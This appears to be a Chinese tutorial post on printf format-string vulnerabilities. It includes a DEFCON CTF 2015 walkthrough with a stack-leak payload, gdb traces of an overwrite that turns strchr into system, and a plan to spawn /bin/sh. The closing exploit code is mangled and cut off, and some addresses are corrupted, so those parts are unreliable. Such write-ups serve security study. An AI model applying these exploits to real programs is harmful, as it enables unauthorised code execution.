阅读:3225回复:0
二进制漏洞之——邪恶的printf
◆0 前言
本文是二进制漏洞相关的系列文章。printf有一些鲜为人知的特性,在为编码提供便利的同时,也引入了安全的问题。本文重点描述printf在漏洞利用中的一些用法,在正常的编程中不建议这么用。 ◆1 概述 printf系列函数的%$(如:%20$x)格式输出,可泄漏栈内的数据(如模块加载的基址),给攻方提供下一步所必须的信息; prinrf系列函数的%n、%hn格式输出,可修改栈中指针指向的任意可写地址(如函数向量表中函数的地址,Windows下叫IAT)。 ◆2 基础知识 通常printf的%根据在格式串中出现的顺序,依次使用栈中的地址,但是使用$可以指定特定序号的栈参数。例如: printf(%20$x, 0x100)实际输出的是第20个参数的值。尽管调用者没有提供20个参数,但是c调用格式的压栈方式,能使该代码顺利执行。 第20个参数就是call之前的[esp+4*20],如果在某次call时,[esp+4*20]固定的保存着某个关键值,该值就会泄漏给攻击者。 如果该值是镜像模块的某一地址,这个泄漏就会使ASLR(Address space layout randomization)形同虚设。 printf系列函数的%n格式在编程中并不常用。在MS的高版本的运行时库中已经不支持了,代替的是_printf_p函数,参见:https://msdn.microsoft.com/zh-cn/library/Vstudio/bt7tawza(v=vs.110).aspx 以下是printf特殊用法的一些例子: printf("%2$c,%1$cn", 'B', 'A'); //$表示使用第几个参数,输出A,Bprintf("%88c%nn", 'A', buff); //打印88个字符,前面用空格填充, //最后一个是'A',同时*(int *)buff=88。printf("%1024c%23$hnn"); //带有攻击性的做法,第01个参数对用%c, //具体是什么不关心,目标是是把第23个参数 //指向的内存的前2个字节赋值为1024。printf("%*c%hnn", 0x1234, 'A', buff); //打印0x1234个字符,前面用空格填充, //最后一个是'A',同时*(short *)buff = 0x1234。上面这行代码具体说明一下: [*]%*c 打印0x1234个字符,前面用空格填充,最后一个是'A' [*]%hn 把前面打印的字符数(0x1024)输出到buff指向的2个字节 [*]%ln 把前面打印的字符数(0x1024)输出到buff指向的4个字节 [*]%n 把前面打印的字符数(0x1024)输出到buff指向的4个字节 printf("%#dn", 0x10); //#表示输出前导符,如:16printf("%#xn", 0x10); //#表示输出前导符,如:0x10printf("%#on", 0x10); //#表示输出前导符,如:020◆3 实例片段 下面是内存的栈内存的变化情况来展示攻击的过程。 在调用printf时,执行call指令之前: (gdb) uu $eip=> 0x2a9188: call 0x2a8880 0x2a918d: lea eax,[ebx-0x1fb4] 0x2a9193: mov DWORD PTR [esp],eax此时的堆栈如下: (gdb) dd $esp0xBFFF4FE0 : BFFF501C 58601366 4049BEFE EF0F16F40xBFFF4FF0 : BFC8B039 004E6927 BFFF522C BFFF50240xBFFF5000 : BFFF5233 BFFF5026 58601366 4049BEFE0xBFFF5010 : EF0F16F4 BFC8B039 00000001 342E31350xBFFF5020 : 33313239 2D202C37 39312E30 383738320xBFFF5030 : 31253A20 25633632 68243732 3432256E0xBFFF5040 : 63363539 24383225 41416E68 002AD05E0xBFFF5050 : 002AD05C 00280000 00470048 00000006其中第一个参数BFFF501C,就是攻击字符串,从以下代码可以看到,目标地址是第27、28参数的两个地址: (gdb) db BFFF501C0xBFFF501C : 35 31 2E 34 39 32 31 33 - 37 2C 20 2D 30 2E 31 39 51.492137, -0.190xBFFF502C : 32 38 37 38 20 3A 25 31 - 32 36 63 25 32 37 24 68 2878 :%126c%27$h0xBFFF503C : 6E 25 32 34 39 35 36 63 - 25 32 38 24 68 6E 41 41 n%24956c%28$hnAA0xBFFF504C : 5E D0 2A 00 5C D0 2A 00 - 00 00 28 00 48 00 47 00 ^.*..*...(.H.G.第27个参数是002AD05E,第28个参数是002AD05C,实际上是修改002AD05C处的4个字节。 目标地址002AD05C在调用printf之前的值是009843E0: (gdb) dd ◆02AD05C◆02AD05C : 009843E0 002A89B6 00921C00 002A89D6◆02AD06C : 0099C620 002A89F6 00A07EC0 002A8A16◆02AD07C : 009EF0D0 009371C0 009EEBD0 002A8A56◆02AD08C : 00000000 002AD090 00000000 00000000地址009843E0就是函数strchr,可以查看一下: (gdb) uu ◆9843E0 0x9843e0 : push edi 0x9843e1 : mov eax,DWORD PTR [esp+0x8] 0x9843e5 : mov edx,DWORD PTR [esp+0xc] 0x9843e9 : mov dh,dl接着执行printf的调用: (gdb) nn ◆02a918d in ?? ()=> 0x2a918d: lea eax,[ebx-0x1fb4]调用printf之后,查看目标地址002AD05C的值: (gdb) dd ◆02AD05C◆02AD05C : 00946210 002A89B6 00921C00 002A89D6◆02AD06C : 0099C620 002A89F6 00A07EC0 002A8A16◆02AD07C : 009EF0D0 009371C0 009EEBD0 002A8A56◆02AD08C : 00000000 002AD090 00000000 00000000原来的009843E0变成了00946210,也就是system的地址,可以查看一下: (gdb) uu 0x946210 0x946210 : sub esp,0xc 0x946213 : mov DWORD PTR [esp+0x4],esi 0x946217 : mov esi,DWORD PTR [esp+0x10]此时对strchr的调用变成了对system的调用,随后如果攻击者发送"/bin/sh"字符串,本来由strchr处理的事情,现在变成了由system处理,从而达成了执行system("/bin/sh")的目标。 ◆4 实例分析 这里采用了DEFCON CTF 2015的一个pwn做为例子(wwtw_c3722e23150e1d5abbc1c248d99d718d)。 在wwtw前面的俄罗斯方块的剧情可nop掉,以便程序直接到我们关注的函数sub_1027()。此外,定时器也会影响调试,给nop掉以方便调试。 要攻击的目标函数流程如下: #!c++int sub_1027(){ double v0; // ST28_8@6 int result; // eax@9 int v2; // ecx@9 char *nptr; // [sp+24h] [bp-424h]@4 double v4; // [sp+30h] [bp-418h]@6 char s; // [sp+3Ch] [bp-40Ch]@2 int v6; // [sp+43Ch] [bp-Ch]@1 v6 = *MK_FP(__GS__, 20); while ( 1 ) { while ( 1 ) { printf("Coordinates: "); fflush(stdout); if ( sub_F7E(0, (int)&s, 0x3FF, 10) == -1 ) exit(-1); nptr = strchr(&s, 0x2C); if ( nptr ) break; puts("Invalid coordinates"); } v0 = atof(&s); v4 = atof(nptr + 1); printf("%f, %fn", v0, v4); if ( 51.492137 != v0 || -0.192878 != v4 ) break; printf("Coordinate "); printf(&s); printf(" is occupied by another TARDIS. Materializing there "); puts("would rip a hole in time and space. Choose again."); fflush(stdout); } printf("You safely travel to coordinates %sn", &s); result = fflush(stdout); if ( *MK_FP(__GS__, 20) != v6 ) sub_2EF0(v2, *MK_FP(__GS__, 20) ^ v6); return result;}其中sub_F7E()函数读取用户的输入,放在0x3FF长的一段内存中,从汇编码看这是一个栈上的内存,这是一个关键,如果放在堆中就很难完成攻击。 用户输入的数据在函数内经过一番处理后,printf(&s)又把用户的输入原样输出了。因此我们可以构造下面的字符串,来获取libc和程序本身的加载地址。 "51.492137, -0.192878 :%282$p:%275$p:n"相应得到的返回结果: Coordinate 51.492137, -0.192878 :0x917744:0x2a9491: is occupied by another TARDIS.Materializing there would rip a hole in time and space. Choose again.其中0x917744是libc代码段的一个固定地址,0x2a9491是程序自己代码段的一个固定地址,由于是固定的地址,因此可通过偏移修正得到加载基址: libc_base = 0x917744 - 0xc744 = 0x90b000mod_base = 0x2a9491 - 0x1491 = 0x2a8000接着进行下一步的攻击,终极目标是执行system("/bin/sh")。 这里选择替换strchr()的IAT,当然atof()也是一个不错的选择。从IDA可以知道strchr()的IAT偏移为0x505c, system()在libc中的实际偏移地址为0x3b210。结合上面得到的mod_base和libc_base可以算出攻击时system()的地址和strchr()的IAT的真实地址,而不受ASLR的限制。 system_funaddr = 0x90b000 + 0x3b210= 0x946210strchr_iataddr = 0x2a8000 + 0x505c = 0x2ad05c攻击目标进一步明确为: 替换mod_base+0x505c处的值为libc_base+0x3b210; 发送"/bin/sh",触发system("/bin/sh")。 用libformatstr可方便的生成exp,参见:https://github.com/hellman/libformatstr preload = "51.492137, -0.192878 :"prelen = len(preload) ###22###offset = ((system_funaddr >> 16 - prelen) > 16) - prelen) |
|